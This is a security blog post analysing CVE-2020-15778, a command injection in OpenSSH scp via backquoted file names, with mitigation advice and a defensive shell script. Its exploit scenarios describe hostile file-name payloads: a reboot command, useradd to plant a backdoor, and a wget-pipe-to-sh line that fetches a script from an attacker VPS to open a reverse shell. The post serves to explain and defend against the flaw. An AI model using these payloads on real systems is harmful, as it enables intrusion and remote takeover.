Cve-2020-15778 SSH vulnerability recurrence analysis
2022-05-15 07:51:53【Irteam - Industrial Safety】
Many industrial routers and some controllers use OpenSSH for external connections and management. On 9 July 2020 the foreign security researcher Chinmay Pandya found a command injection vulnerability in the scp command of OpenSSH 8.3p1 and earlier.
In the scp.c source at https://github.com/openssh/openssh-portable/blob/master/scp.c, line 989 is where the vulnerability is triggered. When copying files to a remote server, the file path is appended to the end of the scp command that is run locally. For example, if you execute the following command:
scp [email protected]:directory/TargetFile
It will execute a local command:
When the local scp command is constructed, the file name is not sanitized. An attacker can inject a file name wrapped in backquotes (`) as a command, and Linux accepts backquotes (`) in file names. If the payload is placed in backquotes as the file name, the command is executed when scp is invoked.
Exploit scenarios:
An attacker can disguise a USB drive as device firmware or some kind of tool, create a deep subdirectory on the drive, and name a file in that directory `payload`, for example `reboot`. When the victim copies the USB directories and files with scp -r \Folder RemoteIP:\Folder, that command triggers a reboot of the victim's machine. Similarly, a file name built from backquotes plus useradd can open a backdoor directly on the victim's machine. A more malicious red team use is to set up FTP on a VPS holding a reverse shell script, then use backquotes (`) combined with wget http://vps:port/xxx.sh | sh ./xxx.sh as the file name, triggering the victim to reverse shell to the VPS.
For remote command execution, authorized_keys still has to be bypassed, so the remote vector is less likely to be used. The following PoC video is only there to show that remote command execution is possible, but the premise is bypassing authorized_keys; otherwise you still need to know the password.
Protection solutions:
As of now, the openssh github has not fixed this vulnerability. Disable the scp -r whole-directory copy method; instead use tar to compress the directory into a single file, scp that file to the remote machine, and then extract the directory over ssh on the remote machine.
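As an added defensive example (not code from the original article or from OpenSSH), the following POSIX shell functions implement the two halves of the advice above: a pre-flight check that refuses to scp -r a tree whose entry names contain shell metacharacters, and the tar-then-scp-then-ssh transfer. The host, destination path and the fixed remote archive name are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original article. scp builds the remote
# command by concatenating the path, so a name containing backquotes,
# $(...), ';', '|' or '&' is interpreted by the remote shell
# (CVE-2020-15778). Check the tree first, and move whole directories as a
# single fixed-name archive so no entry name reaches a command line.

# Return 0 if every name under $1 is free of shell metacharacters,
# 1 if any name contains one. Works on plain `find` output (POSIX).
check_tree_names() {
    dir=$1
    # Bracket expression: backquote, dollar, semicolon, pipe, ampersand,
    # parentheses and redirection operators are all literal inside [...].
    if LC_ALL=C find "$dir" -print | grep -q '[`$;|&()<>]'; then
        return 1
    fi
    return 0
}

# Transfer a directory without scp -r: pack it locally with tar, copy the
# single archive with scp, then unpack it over ssh. $2 is "user@host" and
# $3 the remote destination directory (both hypothetical inputs).
safe_copy_dir() {
    src=$1 host=$2 dest=$3
    check_tree_names "$src" || { echo "refusing: unsafe name under $src" >&2; return 2; }
    archive=$(mktemp) || return 1
    # -C parent + basename keeps the archive rooted at the directory itself.
    tar -cf "$archive" -C "$(dirname "$src")" "$(basename "$src")" || return 1
    # Remote archive path is a fixed constant chosen by us, never derived
    # from the tree being copied.
    scp "$archive" "$host:/tmp/transfer.tar" || return 1
    rm -f "$archive"
    ssh "$host" "mkdir -p '$dest' && tar -xf /tmp/transfer.tar -C '$dest' && rm -f /tmp/transfer.tar"
}

# Usage (hypothetical host): safe_copy_dir ./firmware admin@192.0.2.10 /opt/upload
```

Even with the tar path, check_tree_names is still run first so that a file like `reboot` on a USB drive is reported before anything leaves the machine.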
Reference: https://github.com/cpandya2909/CVE-2020-15778
Author: Irteam - Industrial Safety. Please include the original link when reprinting, thank you.